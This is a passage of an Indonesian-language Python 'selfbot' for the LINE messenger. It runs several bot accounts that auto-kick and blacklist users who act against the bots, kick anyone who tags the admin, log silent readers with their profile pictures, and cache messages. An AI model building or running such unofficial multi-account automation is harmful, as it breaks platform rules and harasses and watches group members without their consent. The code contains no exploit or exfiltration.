kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param3)
kc.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.findAndAddContactsByMid(op.param3)
km.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.findAndAddContactsByMid(op.param3)
kb.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
pass
return
if Amid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param3)
kc.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.findAndAddContactsByMid(op.param3)
km.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.findAndAddContactsByMid(op.param3)
kb.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
pass
return
if Bmid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param3)
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.findAndAddContactsByMid(op.param3)
km.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.findAndAddContactsByMid(op.param3)
kb.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param3)
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
pass
return
if Cmid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.findAndAddContactsByMid(op.param3)
km.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.findAndAddContactsByMid(op.param3)
km.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.findAndAddContactsByMid(op.param3)
kb.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
pass
return
if Dmid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.findAndAddContactsByMid(op.param3)
kb.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param3)
kc.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kb.kickoutFromGroup(op.param1,[op.param2])
kb.findAndAddContactsByMid(op.param3)
kb.inviteIntoGroup(op.param1,[op.param3])
km.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
pass
return
if Dmid in op.param3:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param3)
kc.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
km.kickoutFromGroup(op.param1,[op.param2])
km.findAndAddContactsByMid(op.param3)
km.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
kb.acceptGroupInvitation(op.param1)
wait["blacklist"][op.param2] = True
except:
pass
return
if op.type == 19:
if op.param3 in admin:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
except:
pass
return
if op.type == 19:
if op.param3 in staff:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param3)
ki.inviteIntoGroup(op.param1,[op.param3])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param3)
kk.inviteIntoGroup(op.param1,[op.param3])
except:
pass
return
if op.type == 55:
if op.param2 in wait["blacklist"]:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.param1 in Setmain["readPoint"]:
if op.param2 in Setmain["readMember"][op.param1]:
pass
else:
Setmain["readMember"][op.param1][op.param2] = True
else:
pass
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
Name = cl.getContact(op.param2).displayName
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n~ " + Name
siderMembers(op.param1, [op.param2])
sider = cl.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+sider
cl.sendImageWithURL(op.param1, image)
if op.type == 26:
if wait["selfbot"] == True:
msg = op.message
if msg._from not in Bots:
if msg._from in wait["blacklist"]:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
if msg._from not in Bots:
if wait["talkban"] == True:
if msg._from in wait["Talkblacklist"]:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
if 'MENTION' in msg.contentMetadata.keys() != None:
if msg._from not in Bots:
if wait["detectMention"] == True:
name = re.findall(r'@(\w+)', msg.text)
contact = cl.getContact(msg._from)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in admin:
saints = cl.getContact(msg._from)
sendMention(msg._from, saints.mid, "", wait["Respontag"])
cl.sendImageWithURL(msg._from,image)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if msg._from not in Bots:
if wait["mentionKick"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in admin:
cl.sendMessage(msg.to, "Jangan tag saya ogeb...")
cl.kickoutFromGroup(msg.to, [msg._from])
break
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 2:
if msg.toType == 0:
to = msg._from
elif msg.toType == 2:
to = msg.to
if msg.contentType == 16:
if wait["Timeline"] == True:
ret_ = "「 Detail Postingan 」"
if msg.contentMetadata["serviceType"] == "GB":
contact = cl.getContact(sender)
auth = "\n• Penulis : {}".format(str(contact.displayName))
else:
auth = "\n• Penulis : {}".format(str(msg.contentMetadata["serviceName"]))
ret_ += auth
if "stickerId" in msg.contentMetadata:
stck = "\n• Stiker : https://line.me/R/shop/detail/{}".format(str(msg.contentMetadata["packageId"]))
ret_ += stck
if "mediaOid" in msg.contentMetadata:
object_ = msg.contentMetadata["mediaOid"].replace("svc=myhome|sid=h|","")
if msg.contentMetadata["mediaType"] == "V":
if msg.contentMetadata["serviceType"] == "GB":
ourl = "\n• Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(msg.contentMetadata["mediaOid"]))
murl = "\n• Media URL : https://obs-us.line-apps.com/myhome/h/download.nhn?{}".format(str(msg.contentMetadata["mediaOid"]))
else:
ourl = "\n• Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(object_))
murl = "\n• Media URL : https://obs-us.line-apps.com/myhome/h/download.nhn?{}".format(str(object_))
ret_ += murl
else:
if msg.contentMetadata["serviceType"] == "GB":
ourl = "\n• Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(msg.contentMetadata["mediaOid"]))
else:
ourl = "\n• Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(object_))
ret_ += ourl
if "text" in msg.contentMetadata:
text = "\n• Tulisan : {}".format(str(msg.contentMetadata["text"]))
purl = "\n• Post URL : {}".format(str(msg.contentMetadata["postEndUrl"]).replace("line://","https://line.me/R/"))
ret_ += purl
ret_ += text
cl.sendMessage(to, str(ret_))
channel.like(url[25:58], url[66:], likeType=1006)
channel.comment(url[25:58], url[66:], wait["message"])
if msg.contentType == 0:
msg_dict[msg.id] = {"text":msg.text,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 1:
path = cl.downloadObjectMsg(msg_id)
msg_dict[msg.id] = {"text":'Gambarnya dibawah',"data":path,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 7:
stk_id = msg.contentMetadata["STKID"]
stk_ver = msg.contentMetadata["STKVER"]
pkg_id = msg.contentMetadata["STKPKGID"]
ret_ = "\n\n「 Sticker Info 」"
ret_ += "\n• Sticker ID : {}".format(stk_id)
ret_ += "\n• Sticker Version : {}".format(stk_ver)
ret_ += "\n• Sticker Package : {}".format(pkg_id)
ret_ += "\n• Sticker Url : line://shop/detail/{}".format(pkg_id)
query = int(stk_id)
if type(query) == int:
data = 'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(query)+'/ANDROID/sticker.png'
path = cl.downloadFileURL(data)
msg_dict1[msg.id] = {"text":str(ret_),"data":path,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 7:
if wait["stickerOn"] == True:
stk_id = msg.contentMetadata['STKID']
stk_ver = msg.contentMetadata['STKVER']
pkg_id = msg.contentMetadata['STKPKGID']
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
r = s.get("https://store.line.me/stickershop/product/{}/id".format(urllib.parse.quote(pkg_id)))
soup = BeautifulSoup(r.content, 'html5lib')
data = soup.select("[class~=mdBtn01Txt]")[0].text
if data == 'Lihat Produk Lain':
ret_ = "「 Sticker Info 」"
ret_ += "\n• STICKER ID : {}".format(stk_id)
ret_ += "\n• STICKER PACKAGES ID : {}".format(pkg_id)
ret_ += "\n• STICKER VERSION : {}".format(stk_ver)
ret_ += "\n• STICKER URL : line://shop/detail/{}".format(pkg_id)
cl.sendMessage(msg.to, str(ret_))
query = int(stk_id)
if type(query) == int:
data = 'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(query)+'/ANDROID/sticker.png'
path = cl.downloadFileURL(data)
cl.sendImage(msg.to,path)
else:
ret_ = "「 Sticker Info 」"
ret_ += "\n• PRICE : "+soup.findAll('p', attrs={'class':'mdCMN08Price'})[0].text
ret_ += "\n• AUTHOR : "+soup.select("a[href*=/stickershop/author]")[0].text
ret_ += "\n• STICKER ID : {}".format(str(stk_id))
ret_ += "\n• STICKER PACKAGES ID : {}".format(str(pkg_id))
ret_ += "\n• STICKER VERSION : {}".format(str(stk_ver))
ret_ += "\n• STICKER URL : line://shop/detail/{}".format(str(pkg_id))
ret_ += "\n• DESCRIPTION :\n"+soup.findAll('p', attrs={'class':'mdCMN08Desc'})[0].text
cl.sendMessage(msg.to, str(ret_))
query = int(stk_id)
if type(query) == int:
data = 'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(query)+'/ANDROID/sticker.png'
path = cl.downloadFileURL(data)
cl.sendImage(msg.to,path)
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
cl.sendMessage(msg.to," 「 Contact Info 」\n「✭」 Nama : " + msg.contentMetadata["displayName"] + "\n「✭」 MID : " + msg.contentMetadata["mid"] + "\n「✭」 Status Msg : " + contact.statusMessage + "\n「✭」 Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
if msg.contentType == 13:
if msg._from in admin:
if wait["invite"] == True:
msg.contentType = 0
contact = cl.getContact(msg.contentMetadata["mid"])
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if invite in wait["blacklist"]:
cl.sendMessage(msg.to, "「Dia ke bl kak... hpus bl dulu lalu invite lagi」")
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
ryan = cl.getContact(target)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Sukses Invite 」\nNama "
ret_ = "「Ketik Invite off jika sudah done」"
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(msg.to, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
wait["invite"] = False
break
except:
cl.sendText(msg.to,"Anda terkena limit")
wait["invite"] = False
break
#ADD Bots
if msg.contentType == 13:
if msg._from in admin:
if wait["addbots"] == True:
if msg.contentMetadata["mid"] in Bots:
cl.sendMessage(msg.to,"Contact itu sudah jadi anggota bot")
wait["addbots"] = True
else:
Bots.append(msg.contentMetadata["mid"])
wait["addbots"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke anggota bot")
if wait["dellbots"] == True:
if msg.contentMetadata["mid"] in Bots:
Bots.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari anggota bot")
else:
wait["dellbots"] = True
cl.sendMessage(msg.to,"Contact itu bukan anggota bot saints")
#ADD STAFF
if msg._from in admin:
if wait["addstaff"] == True:
if msg.contentMetadata["mid"] in staff:
cl.sendMessage(msg.to,"Contact itu sudah jadi staff")
wait["addstaff"] = True
else:
staff.append(msg.contentMetadata["mid"])
wait["addstaff"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke staff")
if wait["dellstaff"] == True:
if msg.contentMetadata["mid"] in staff:
staff.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari staff")
wait["dellstaff"] = True
else:
wait["dellstaff"] = True
cl.sendMessage(msg.to,"Contact itu bukan staff")
#ADD ADMIN
if msg._from in admin:
if wait["addadmin"] == True:
if msg.contentMetadata["mid"] in admin:
cl.sendMessage(msg.to,"Contact itu sudah jadi admin")
wait["addadmin"] = True
else:
admin.append(msg.contentMetadata["mid"])
wait["addadmin"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke admin")
if wait["delladmin"] == True:
if msg.contentMetadata["mid"] in admin:
admin.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari admin")
else:
wait["delladmin"] = True
cl.sendMessage(msg.to,"Contact itu bukan admin")
#ADD BLACKLIST
if msg._from in admin:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di blacklist")
wait["wblacklist"] = True
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke blacklist user")
if wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari blacklist user")
else:
wait["dblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di blacklist")
#TALKBAN
if msg._from in admin:
if wait["Talkwblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di Talkban")
wait["Talkwblacklist"] = True
else:
wait["Talkblacklist"][msg.contentMetadata["mid"]] = True
wait["Talkwblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke Talkban user")
if wait["Talkdblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
del wait["Talkblacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari Talkban user")
else:
wait["Talkdblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di Talkban")
#UPDATE FOTO
if msg.contentType == 1:
if msg._from in admin:
if wait["Addimage"]["status"] == True:
path = cl.downloadObjectMsg(msg.id)
images[wait["Addimage"]["name"]] = str(path)
f = codecs.open("image.json","w","utf-8")
json.dump(images, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendMessage(msg.to, "Berhasil menambahkan gambar {}".format(str(wait["Addimage"]["name"])))
wait["Addimage"]["status"] = False
wait["Addimage"]["name"] = ""
if msg.contentType == 2:
if msg._from in admin:
if wait["Addvideo"]["status"] == True:
path = cl.downloadObjectMsg(msg.id)
videos[wait["Addvideo"]["name"]] = str(path)
f = codecs.open("video.json","w","utf-8")
json.dump(videos, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendMessage(msg.to, "Berhasil menambahkan video {}".format(str(wait["Addvideo"]["name"])))
wait["Addvideo"]["status"] = False
wait["Addvideo"]["name"] = ""
if msg.contentType == 7:
if msg._from in admin:
if wait["Addsticker"]["status"] == True:
stickers[wait["Addsticker"]["name"]] = {"STKID":msg.contentMetadata["STKID"],"STKPKGID":msg.contentMetadata["STKPKGID"]}
f = codecs.open("sticker.json","w","utf-8")
json.dump(stickers, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendMessage(msg.to, "Berhasil menambahkan sticker {}".format(str(wait["Addsticker"]["name"])))
wait["Addsticker"]["status"] = False
wait["Addsticker"]["name"] = ""
if msg.contentType == 3:
if msg._from in admin:
if wait["Addaudio"]["status"] == True:
path = cl.downloadObjectMsg(msg.id)
audios[wait["Addaudio"]["name"]] = str(path)
f = codecs.open("audio.json","w","utf-8")
json.dump(audios, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendMessage(msg.to, "Berhasil menambahkan mp3 {}".format(str(wait["Addaudio"]["name"])))
wait["Addaudio"]["status"] = False
wait["Addaudio"]["name"] = ""
if msg.toType == 2:
if msg._from in admin:
if settings["groupPicture"] == True:
path = cl.downloadObjectMsg(msg_id)
settings["groupPicture"] = False
cl.updateGroupPicture(msg.to, path)
cl.sendMessage(msg.to, "Berhasil mengubah foto group")
if msg.contentType == 1:
if msg._from in admin:
if mid in Setmain["foto"]:
path = cl.downloadObjectMsg(msg_id)
del Setmain["foto"][mid]
cl.updateProfilePicture(path)
cl.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 2:
if msg._from in admin:
if mid in Setmain["video"]:
path = cl.downloadObjectMsg(msg_id)
del Setmain["video"][mid]
cl.updateProfileVideoPicture(path)
cl.sendMessage(msg.to,"Foto berhasil dirubah jadi video")
if msg.contentType == 1:
if msg._from in admin:
if Amid in Setmain["foto"]:
path = ki.downloadObjectMsg(msg_id)
del Setmain["foto"][Amid]
ki.updateProfilePicture(path)
ki.sendMessage(msg.to,"Foto berhasil dirubah")
elif Bmid in Setmain["foto"]:
path = kk.downloadObjectMsg(msg_id)
del Setmain["foto"][Bmid]
kk.updateProfilePicture(path)
kk.sendMessage(msg.to,"Foto berhasil dirubah")
elif Cmid in Setmain["foto"]:
path = kc.downloadObjectMsg(msg_id)
del Setmain["foto"][Cmid]
kc.updateProfilePicture(path)
kc.sendMessage(msg.to,"Foto berhasil dirubah")
elif Dmid in Setmain["foto"]:
path = km.downloadObjectMsg(msg_id)
del Setmain["foto"][Dmid]
km.updateProfilePicture(path)
km.sendMessage(msg.to,"Foto berhasil dirubah")
elif Emid in Setmain["foto"]:
path = kb.downloadObjectMsg(msg_id)
del Setmain["foto"][Emid]
kb.updateProfilePicture(path)
kb.sendMessage(msg.to,"Foto berhasil dirubah")
elif Zmid in Setmain["foto"]:
path = sw.downloadObjectMsg(msg_id)
del Setmain["foto"][Zmid]
sw.updateProfilePicture(path)
sw.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if settings["changePicture"] == True:
path1 = ki.downloadObjectMsg(msg_id)
path2 = kk.downloadObjectMsg(msg_id)
path3 = kc.downloadObjectMsg(msg_id)
path4 = km.downloadObjectMsg(msg_id)
path5 = kb.downloadObjectMsg(msg_id)
settings["changePicture"] = False
ki.updateProfilePicture(path1)
ki.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kk.updateProfilePicture(path2)
kk.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kc.updateProfilePicture(path3)
kc.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
km.updateProfilePicture(path4)
km.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kb.updateProfilePicture(path5)
kb.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
if msg.contentType == 0:
if Setmain["autoRead"] == True:
cl.sendChatChecked(msg.to, msg_id)
if text is None:
return
else:
for sticker in stickers:
if msg._from in admin:
if text.lower() == sticker:
sid = stickers[text.lower()]["STKID"]
spkg = stickers[text.lower()]["STKPKGID"]
cl.sendSticker(to, spkg, sid)
for image in images:
if msg._from in admin:
if text.lower() == image:
cl.sendImage(msg.to, images[image])
for audio in audios:
if msg._from in admin:
if text.lower() == audio:
cl.sendAudio(msg.to, audios[audio])
for video in videos:
if msg._from in admin:
if text.lower() == video:
cl.sendVideo(msg.to, videos[video])
cmd = command(text)
if cmd == "self on":
if msg._from in admin:
wait["selfbot"] = True
cl.sendText(msg.to, "Selfbot diaktifkan")
elif cmd == "self off":
if msg._from in admin:
wait["selfbot"] = False
cl.sendText(msg.to, "Selfbot dinonaktifkan")
elif cmd == "help1":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage = help()
ryan = cl.getContact(mid)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Selfbot Command 」\n• User : "
ret_ = str(helpMessage)
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x \n\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(to, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
elif cmd == "help2":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage1 = helpbot()
ryan = cl.getContact(mid)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Setting Blacklist 」\n• User : "
ret_ = str(helpMessage1)
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x \n\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(to, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
elif cmd == "setting":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
md = "\n「Settings List Protection」\n"
if wait["mentionKick"] == True: md+="「✭」 Notag「ON」\n"
else: md+="「✭」 Notag「OFF」\n"
if wait["stickerOn"] == True: md+="「✭」 Sticker「ON」\n"
else: md+="「✭」 Sticker「OFF」\n"
if wait["contact"] == True: md+="「✭」 Contact「ON」\n"
else: md+="「✭」 Contact「OFF」\n"
if wait["talkban"] == True: md+="「✭」 Talkban「ON」\n"
else: md+="「✭」 Talkban「OFF」\n"
if wait["unsend"] == True: md+="「✭」 Unsend「ON」\n"
else: md+="「✭」 Unsend「OFF」\n"
if wait["detectMention"] == True: md+="「✭」 Respon「ON」\n"
else: md+="「✭」 Respon「OFF」\n"
if wait["Timeline"] == True: md+="「✭」 Timeline「ON」\n"
else: md+="「✭」 Timeline「OFF」\n"
if wait["autoJoin"] == True: md+="「✭」 Autojoin「ON」\n"
else: md+="「✭」 Autojoin「OFF」\n"
if wait["autoAdd"] == True: md+="「✭」 Autoadd「ON」\n"
else: md+="「✭」 Autoadd「OFF」\n"
if settings["autoJoinTicket"] == True: md+="「✭」 Jointicket「ON」\n"
